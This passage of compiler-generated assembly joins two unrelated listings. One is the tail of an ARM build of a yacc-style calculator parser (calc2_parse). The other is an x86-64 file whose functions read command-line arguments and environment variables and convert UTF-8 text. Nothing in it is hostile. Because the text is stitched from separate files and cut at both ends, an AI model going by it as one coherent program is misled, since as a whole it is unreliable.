r3, r3, #16 cmp r2, r3 bne .L34 ldr r3, .L90+12 ldr r2, [r3, #8] ldr r3, .L90+12 ldr r3, [r3, #12] cmp r2, r3 bcc .L35 ldr r0, .L90+12 bl yygrowstack mov r3, r0 cmn r3, #2 beq .L82 .L35: ldr r2, .L90+28 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-16] ldr r3, .L90+12 ldr r3, [r3, #8] add r3, r3, #2 ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #8] ldr r1, .L90+28 ldr r2, [fp, #-20] lsl r2, r2, #1 add r2, r1, r2 ldrsh r2, [r2] strh r2, [r3] @ movhi ldr r3, .L90+12 ldr r3, [r3, #20] add r3, r3, #4 ldr r2, .L90+12 str r3, [r2, #20] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r2, .L90+32 ldr r2, [r2] str r2, [r3] ldr r3, .L90+8 mvn r2, #0 str r2, [r3] ldr r3, .L90+4 ldr r3, [r3] cmp r3, #0 ble .L30 ldr r3, .L90+4 ldr r3, [r3] sub r3, r3, #1 ldr r2, .L90+4 str r3, [r2] b .L30 .L34: ldr r2, .L90+36 ldr r3, [fp, #-16] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L37 ldr r3, .L90+8 ldr r3, [r3] ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 blt .L37 ldr r3, [fp, #-20] cmp r3, #220 bgt .L37 ldr r2, .L90+24 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r2, [r3] ldr r3, .L90+8 ldr r3, [r3] lsl r3, r3, #16 asr r3, r3, #16 cmp r2, r3 bne .L37 ldr r2, .L90+28 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-20] b .L32 .L37: ldr r3, .L90+4 ldr r3, [r3] cmp r3, #0 bne .L83 ldr r2, .L90+40 ldr r1, [fp, #-28] ldr r0, [fp, #-24] bl calc2_error nop .L40: ldr r3, .L90 ldr r3, [r3] add r3, r3, #1 ldr r2, .L90 str r3, [r2] b .L39 .L83: nop .L39: ldr r3, .L90+4 ldr r3, [r3] cmp r3, #2 bgt .L41 ldr r3, .L90+4 mov r2, #3 str r2, [r3] .L46: ldr r3, .L90+12 ldr r3, [r3, #8] ldrsh r3, [r3] ldr r2, .L90+20 lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L42 ldr r3, [fp, #-20] add r3, r3, #256 str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 blt .L42 ldr r3, [fp, #-20] cmp r3, #220 bgt .L42 ldr r2, .L90+24 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] cmp r3, #256 bne .L42 ldr r3, .L90+12 ldr r2, [r3, #8] ldr r3, .L90+12 ldr r3, [r3, #12] cmp r2, r3 bcc .L43 ldr r0, .L90+12 bl yygrowstack mov r3, r0 cmn r3, #2 beq .L84 .L43: ldr r2, .L90+28 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-16] ldr r3, .L90+12 ldr r3, [r3, #8] add r3, r3, #2 ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #8] ldr r1, .L90+28 ldr r2, [fp, #-20] lsl r2, r2, #1 add r2, r1, r2 ldrsh r2, [r2] strh r2, [r3] @ movhi ldr r3, .L90+12 ldr r3, [r3, #20] add r3, r3, #4 ldr r2, .L90+12 str r3, [r2, #20] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r2, .L90+32 ldr r2, [r2] str r2, [r3] b .L30 .L42: ldr r3, .L90+12 ldr r2, [r3, #8] ldr r3, .L90+12 ldr r3, [r3, #4] cmp r2, r3 bls .L85 ldr r3, .L90+12 ldr r3, [r3, #8] sub r3, r3, #2 ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #4 ldr r2, .L90+12 str r3, [r2, #20] b .L46 .L41: ldr r3, .L90+8 ldr r3, [r3] cmp r3, #0 beq .L86 ldr r3, .L90+8 mvn r2, #0 str r2, [r3] b .L30 .L81: nop .L32: ldr r2, .L90+44 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 ble .L48 ldr r3, .L90+12 ldr r2, [r3, #20] ldr r3, [fp, #-8] rsb r3, r3, #1 lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3] ldr r2, .L90+48 str r3, [r2] b .L49 .L48: ldr r3, .L90+48 mov r2, #0 str r2, [r3] .L49: ldr r3, [fp, #-20] sub r3, r3, #3 cmp r3, #15 ldrls pc, [pc, r3, asl #2] b .L87 .L52: .word .L66 .word .L65 .word .L64 .word .L63 .word .L62 .word .L61 .word .L60 .word .L59 .word .L58 .word .L57 .word .L56 .word .L55 .word .L54 .word .L87 .word .L53 .word .L51 .L66: ldr r3, .L90+4 mov r2, #0 str r2, [r3] b .L67 .L65: ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] mov r1, r3 ldr r0, .L90+52 bl printf b .L67 .L64: ldr r3, .L90+12 ldr r2, [r3, #20] ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r3, [r3] lsl r3, r3, #2 ldr r1, [fp, #-24] add r3, r1, r3 ldr r2, [r2] str r2, [r3] b .L67 .L63: ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3, #-4] ldr r2, .L90+48 str r3, [r2] b .L67 .L62: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r2, [r3] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] add r3, r2, r3 ldr r2, .L90+48 str r3, [r2] b .L67 .L61: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r2, [r3] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] sub r3, r2, r3 ldr r2, .L90+48 str r3, [r2] b .L67 .L60: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r3, [r3] ldr r2, .L90+12 ldr r2, [r2, #20] ldr r2, [r2] mul r3, r2, r3 ldr r2, .L90+48 str r3, [r2] b .L67 .L59: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r2, [r3] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] mov r1, r3 mov r0, r2 bl __aeabi_idiv mov r3, r0 mov r2, r3 ldr r3, .L90+48 str r2, [r3] b .L67 .L58: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r2, [r3] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] mov r1, r3 mov r0, r2 bl __aeabi_idivmod mov r3, r1 mov r2, r3 ldr r3, .L90+48 str r2, [r3] b .L67 .L57: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r2, [r3] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] and r3, r3, r2 ldr r2, .L90+48 str r3, [r2] b .L67 .L56: ldr r3, .L90+12 ldr r3, [r3, #20] sub r3, r3, #8 ldr r2, [r3] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] orr r3, r2, r3 ldr r2, .L90+48 str r3, [r2] b .L67 .L55: ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] rsb r3, r3, #0 ldr r2, .L90+48 str r3, [r2] b .L67 .L54: ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 ldr r3, [r3] ldr r2, .L90+48 str r3, [r2] b .L67 .L53: ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] ldr r2, .L90+48 str r3, [r2] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] cmp r3, #0 bne .L68 mov r2, #8 b .L69 .L68: mov r2, #10 .L69: ldr r3, [fp, #-28] str r2, [r3] b .L67 .L51: ldr r3, [fp, #-28] ldr r3, [r3] ldr r2, .L90+12 ldr r2, [r2, #20] sub r2, r2, #4 ldr r2, [r2] mul r2, r3, r2 ldr r3, .L90+12 ldr r3, [r3, #20] ldr r3, [r3] add r3, r2, r3 ldr r2, .L90+48 str r3, [r2] b .L67 .L87: nop .L67: ldr r3, .L90+12 ldr r2, [r3, #8] ldr r3, [fp, #-8] lsl r3, r3, #1 rsb r3, r3, #0 add r3, r2, r3 ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #8] ldrsh r3, [r3] str r3, [fp, #-16] ldr r3, .L90+12 ldr r2, [r3, #20] ldr r3, [fp, #-8] lsl r3, r3, #2 rsb r3, r3, #0 add r3, r2, r3 ldr r2, .L90+12 str r3, [r2, #20] ldr r2, .L90+56 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-8] ldr r3, [fp, #-16] cmp r3, #0 bne .L70 ldr r3, [fp, #-8] cmp r3, #0 bne .L70 mov r3, #1 str r3, [fp, #-16] ldr r3, .L90+12 ldr r3, [r3, #8] add r3, r3, #2 ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #8] mov r2, #1 strh r2, [r3] @ movhi ldr r3, .L90+12 ldr r3, [r3, #20] add r3, r3, #4 ldr r2, .L90+12 str r3, [r2, #20] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r2, .L90+48 ldr r2, [r2] str r2, [r3] ldr r3, .L90+8 ldr r3, [r3] cmp r3, #0 bge .L71 ldr r0, [fp, #-28] bl calc2_lex mov r3, r0 ldr r2, .L90+8 str r3, [r2] ldr r3, .L90+8 ldr r3, [r3] cmp r3, #0 bge .L71 ldr r3, .L90+8 mov r2, #0 str r2, [r3] .L71: ldr r3, .L90+8 ldr r3, [r3] cmp r3, #0 beq .L88 b .L30 .L70: ldr r2, .L90+60 ldr r3, [fp, #-8] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L74 ldr r2, [fp, #-20] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 blt .L74 ldr r3, [fp, #-20] cmp r3, #220 bgt .L74 ldr r2, .L90+24 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r2, [r3] ldr r3, [fp, #-16] lsl r3, r3, #16 asr r3, r3, #16 cmp r2, r3 bne .L74 ldr r2, .L90+28 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-16] b .L75 .L74: ldr r2, .L90+64 ldr r3, [fp, #-8] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-16] .L75: ldr r3, .L90+12 ldr r2, [r3, #8] ldr r3, .L90+12 ldr r3, [r3, #12] cmp r2, r3 bcc .L76 ldr r0, .L90+12 bl yygrowstack mov r3, r0 cmn r3, #2 beq .L89 .L76: ldr r3, .L90+12 ldr r3, [r3, #8] add r3, r3, #2 ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #8] ldr r2, [fp, #-16] lsl r2, r2, #16 asr r2, r2, #16 strh r2, [r3] @ movhi ldr r3, .L90+12 ldr r3, [r3, #20] add r3, r3, #4 ldr r2, .L90+12 str r3, [r2, #20] ldr r3, .L90+12 ldr r3, [r3, #20] ldr r2, .L90+48 ldr r2, [r2] str r2, [r3] b .L30 .L80: nop b .L29 .L82: nop b .L29 .L84: nop b .L29 .L89: nop .L29: ldr r2, .L90+68 ldr r1, [fp, #-28] ldr r0, [fp, #-24] bl calc2_error mov r3, #2 str r3, [fp, #-12] b .L77 .L85: nop b .L45 .L86: nop .L45: mov r3, #1 str r3, [fp, #-12] b .L77 .L88: nop .L73: mov r3, #0 str r3, [fp, #-12] .L77: ldr r3, [fp, #-12] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L91: .align 2 .L90: .word calc2_nerrs .word calc2_errflag .word calc2_char .word yystack .word calc2_defred .word calc2_sindex .word calc2_check .word calc2_table .word calc2_lval .word calc2_rindex .word .LC2 .word calc2_len .word calc2_val .word .LC3 .word calc2_lhs .word calc2_gindex .word calc2_dgoto .word .LC4 .size calc2_parse, .-calc2_parse .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "737529.c" .intel_syntax noprefix .text .local __argc__ .comm __argc__,8,8 .local __argv__ .comm __argv__,8,8 .local cpuCoresNumber .comm cpuCoresNumber,8,8 .section .rodata .LC0: .string "Not enough memory.\n" .text .globl shar__get__cmd__argument .type shar__get__cmd__argument, @function shar__get__cmd__argument: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov QWORD PTR -120[rbp], rdi mov QWORD PTR -128[rbp], rsi mov QWORD PTR -136[rbp], rdx mov QWORD PTR -144[rbp], rcx mov BYTE PTR -102[rbp], 0 mov rax, QWORD PTR __argc__[rip] cmp QWORD PTR -120[rbp], rax jnb .L2 mov rdx, QWORD PTR __argv__[rip] mov rax, QWORD PTR -120[rbp] sal rax, 3 add rax, rdx mov rax, QWORD PTR [rax] mov rdx, QWORD PTR -128[rbp] mov QWORD PTR -96[rbp], rdx mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -136[rbp] mov QWORD PTR -80[rbp], rax mov rax, QWORD PTR -144[rbp] mov QWORD PTR -72[rbp], rax mov QWORD PTR -64[rbp], 0 cmp QWORD PTR -96[rbp], 0 sete al movzx eax, al test rax, rax je .L3 mov QWORD PTR -56[rbp], 0 jmp .L4 .L3: mov rax, QWORD PTR -96[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -40[rbp], rax cmp QWORD PTR -40[rbp], 0 sete al movzx eax, al test rax, rax je .L5 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L5: mov rax, QWORD PTR -40[rbp] mov QWORD PTR -56[rbp], rax .L4: mov QWORD PTR -32[rbp], 0 mov BYTE PTR -101[rbp], 1 .L18: mov rdx, QWORD PTR -88[rbp] mov rax, QWORD PTR -32[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al cmp BYTE PTR -100[rbp], 0 je .L24 mov BYTE PTR -99[rbp], 0 movzx eax, BYTE PTR -100[rbp] mov WORD PTR -98[rbp], ax movzx eax, BYTE PTR -100[rbp] test al, al js .L9 mov BYTE PTR -99[rbp], 1 jmp .L10 .L9: movzx eax, BYTE PTR -100[rbp] and eax, 224 cmp eax, 192 jne .L11 mov BYTE PTR -99[rbp], 2 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al movzx eax, BYTE PTR -100[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L12 mov BYTE PTR -101[rbp], 0 jmp .L8 .L12: xor WORD PTR -98[rbp], 192 sal WORD PTR -98[rbp], 6 movzx eax, BYTE PTR -100[rbp] xor eax, -128 movzx eax, al or WORD PTR -98[rbp], ax jmp .L10 .L11: movzx eax, BYTE PTR -100[rbp] and eax, 240 cmp eax, 224 jne .L13 mov BYTE PTR -99[rbp], 3 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al movzx eax, BYTE PTR -100[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L14 mov BYTE PTR -101[rbp], 0 jmp .L8 .L14: xor WORD PTR -98[rbp], 224 sal WORD PTR -98[rbp], 6 movzx eax, BYTE PTR -100[rbp] xor eax, -128 movzx eax, al or WORD PTR -98[rbp], ax mov rax, QWORD PTR -32[rbp] lea rdx, 2[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al movzx eax, BYTE PTR -100[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L15 mov BYTE PTR -101[rbp], 0 jmp .L8 .L15: sal WORD PTR -98[rbp], 6 movzx eax, BYTE PTR -100[rbp] xor eax, -128 movzx eax, al or WORD PTR -98[rbp], ax jmp .L10 .L13: mov BYTE PTR -101[rbp], 0 jmp .L8 .L10: add QWORD PTR -64[rbp], 1 mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rdx, rax mov rax, QWORD PTR -56[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L16 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L16: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rax, rdx lea rdx, -2[rax] mov rax, QWORD PTR -56[rbp] add rdx, rax movzx eax, WORD PTR -98[rbp] mov WORD PTR [rdx], ax movzx eax, BYTE PTR -99[rbp] add QWORD PTR -32[rbp], rax jmp .L18 .L24: nop .L8: movzx eax, BYTE PTR -101[rbp] xor eax, 1 movzx eax, al test rax, rax je .L19 cmp QWORD PTR -56[rbp], 0 je .L20 mov rax, QWORD PTR -56[rbp] mov rdi, rax call free@PLT .L20: mov QWORD PTR -56[rbp], 0 mov QWORD PTR -64[rbp], 0 .L19: mov rax, QWORD PTR -72[rbp] mov rdx, QWORD PTR -56[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -80[rbp] mov rdx, QWORD PTR -64[rbp] mov QWORD PTR [rax], rdx movzx eax, BYTE PTR -101[rbp] mov BYTE PTR -102[rbp], al jmp .L22 .L2: mov rax, QWORD PTR -136[rbp] mov QWORD PTR [rax], 0 mov rax, QWORD PTR -144[rbp] mov QWORD PTR [rax], 0 .L22: movzx eax, BYTE PTR -102[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size shar__get__cmd__argument, .-shar__get__cmd__argument .globl shar__get__cmd__arguments__count .type shar__get__cmd__arguments__count, @function shar__get__cmd__arguments__count: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR __argc__[rip] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size shar__get__cmd__arguments__count, .-shar__get__cmd__arguments__count .globl shar__get__env__variable .type shar__get__env__variable, @function shar__get__env__variable: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 272 mov QWORD PTR -232[rbp], rdi mov QWORD PTR -240[rbp], rsi mov QWORD PTR -248[rbp], rdx mov QWORD PTR -256[rbp], rcx mov QWORD PTR -264[rbp], r8 mov rax, QWORD PTR -232[rbp] mov QWORD PTR -192[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], 0 mov QWORD PTR -168[rbp], 0 mov QWORD PTR -160[rbp], 0 mov QWORD PTR -152[rbp], 0 jmp .L28 .L40: mov rax, QWORD PTR -152[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -184[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -212[rbp], ax mov BYTE PTR -216[rbp], 0 cmp WORD PTR -212[rbp], 0 je .L65 cmp WORD PTR -212[rbp], 127 ja .L31 mov BYTE PTR -216[rbp], 1 jmp .L32 .L31: cmp WORD PTR -212[rbp], 2047 ja .L33 mov BYTE PTR -216[rbp], 2 jmp .L32 .L33: mov BYTE PTR -216[rbp], 3 .L32: movzx eax, BYTE PTR -216[rbp] add QWORD PTR -160[rbp], rax mov rax, QWORD PTR -176[rbp] mov QWORD PTR -144[rbp], rax mov rax, QWORD PTR -160[rbp] mov QWORD PTR -136[rbp], rax mov rdx, QWORD PTR -136[rbp] mov rax, QWORD PTR -144[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -128[rbp], rax cmp QWORD PTR -128[rbp], 0 sete al movzx eax, al test rax, rax je .L34 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L34: mov rax, QWORD PTR -128[rbp] mov QWORD PTR -176[rbp], rax movzx eax, BYTE PTR -216[rbp] cmp eax, 3 je .L36 cmp eax, 3 jg .L37 cmp eax, 1 je .L38 cmp eax, 2 je .L39 jmp .L37 .L38: mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx movzx edx, WORD PTR -212[rbp] mov BYTE PTR [rax], dl jmp .L37 .L39: movzx eax, WORD PTR -212[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -212[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -168[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -176[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L37 .L36: movzx eax, WORD PTR -212[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -212[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -168[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -176[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -212[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -168[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -176[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L37: movzx eax, BYTE PTR -216[rbp] add QWORD PTR -168[rbp], rax jmp .L30 .L65: nop .L30: add QWORD PTR -152[rbp], 1 .L28: mov rax, QWORD PTR -192[rbp] cmp rax, QWORD PTR -152[rbp] ja .L40 mov rax, QWORD PTR -160[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -176[rbp] mov QWORD PTR -120[rbp], rax mov QWORD PTR -112[rbp], rdx mov rdx, QWORD PTR -112[rbp] mov rax, QWORD PTR -120[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -104[rbp], rax cmp QWORD PTR -104[rbp], 0 sete al movzx eax, al test rax, rax je .L41 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L41: mov rax, QWORD PTR -104[rbp] mov QWORD PTR -176[rbp], rax mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -176[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -208[rbp] mov rdi, rax call getenv@PLT mov QWORD PTR -200[rbp], rax mov rax, QWORD PTR -208[rbp] mov rdi, rax call free@PLT cmp QWORD PTR -200[rbp], 0 jne .L44 mov rax, QWORD PTR -256[rbp] mov QWORD PTR [rax], 0 mov rax, QWORD PTR -264[rbp] mov QWORD PTR [rax], 0 mov eax, 0 jmp .L45 .L44: mov rax, QWORD PTR -248[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -200[rbp] mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -256[rbp] mov QWORD PTR -80[rbp], rax mov rax, QWORD PTR -264[rbp] mov QWORD PTR -72[rbp], rax mov QWORD PTR -64[rbp], 0 cmp QWORD PTR -96[rbp], 0 sete al movzx eax, al test rax, rax je .L46 mov QWORD PTR -56[rbp], 0 jmp .L47 .L46: mov rax, QWORD PTR -96[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -40[rbp], rax cmp QWORD PTR -40[rbp], 0 sete al movzx eax, al test rax, rax je .L48 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L48: mov rax, QWORD PTR -40[rbp] mov QWORD PTR -56[rbp], rax .L47: mov QWORD PTR -32[rbp], 0 mov BYTE PTR -215[rbp], 1 .L61: mov rdx, QWORD PTR -88[rbp] mov rax, QWORD PTR -32[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -214[rbp], al cmp BYTE PTR -214[rbp], 0 je .L66 mov BYTE PTR -213[rbp], 0 movzx eax, BYTE PTR -214[rbp] mov WORD PTR -210[rbp], ax movzx eax, BYTE PTR -214[rbp] test al, al js .L52 mov BYTE PTR -213[rbp], 1 jmp .L53 .L52: movzx eax, BYTE PTR -214[rbp] and eax, 224 cmp eax, 192 jne .L54 mov BYTE PTR -213[rbp], 2 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -214[rbp], al movzx eax, BYTE PTR -214[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L55 mov BYTE PTR -215[rbp], 0 jmp .L51 .L55: xor WORD PTR -210[rbp], 192 sal WORD PTR -210[rbp], 6 movzx eax, BYTE PTR -214[rbp] xor eax, -128 movzx eax, al or WORD PTR -210[rbp], ax jmp .L53 .L54: movzx eax, BYTE PTR -214[rbp] and eax, 240 cmp eax, 224 jne .L56 mov BYTE PTR -213[rbp], 3 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -214[rbp], al movzx eax, BYTE PTR -214[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L57 mov BYTE PTR -215[rbp], 0 jmp .L51 .L57: xor WORD PTR -210[rbp], 224 sal WORD PTR -210[rbp], 6 movzx eax, BYTE PTR -214[rbp] xor eax, -128 movzx eax, al or WORD PTR -210[rbp], ax mov rax, QWORD PTR -32[rbp] lea rdx, 2[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -214[rbp], al movzx eax, BYTE PTR -214[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L58 mov BYTE PTR -215[rbp], 0 jmp .L51 .L58: sal WORD PTR -210[rbp], 6 movzx eax, BYTE PTR -214[rbp] xor eax, -128 movzx eax, al or WORD PTR -210[rbp], ax jmp .L53 .L56: mov BYTE PTR -215[rbp], 0 jmp .L51 .L53: add QWORD PTR -64[rbp], 1 mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rdx, rax mov rax, QWORD PTR -56[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L59 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L59: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rax, rdx lea rdx, -2[rax] mov rax, QWORD PTR -56[rbp] add rdx, rax movzx eax, WORD PTR -210[rbp] mov WORD PTR [rdx], ax movzx eax, BYTE PTR -213[rbp] add QWORD PTR -32[rbp], rax jmp .L61 .L66: nop .L51: movzx eax, BYTE PTR -215[rbp] xor eax, 1 movzx eax, al test rax, rax je .L62 cmp QWORD PTR -56[rbp], 0 je .L63 mov rax, QWORD PTR -56[rbp] mov rdi, rax call free@PLT .L63: mov QWORD PTR -56[rbp], 0 mov QWORD PTR -64[rbp], 0 .L62: mov rax, QWORD PTR -72[rbp] mov rdx, QWORD PTR -56[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -80[rbp] mov rdx, QWORD PTR -64[rbp] mov QWORD PTR [rax], rdx movzx eax, BYTE PTR -215[rbp] 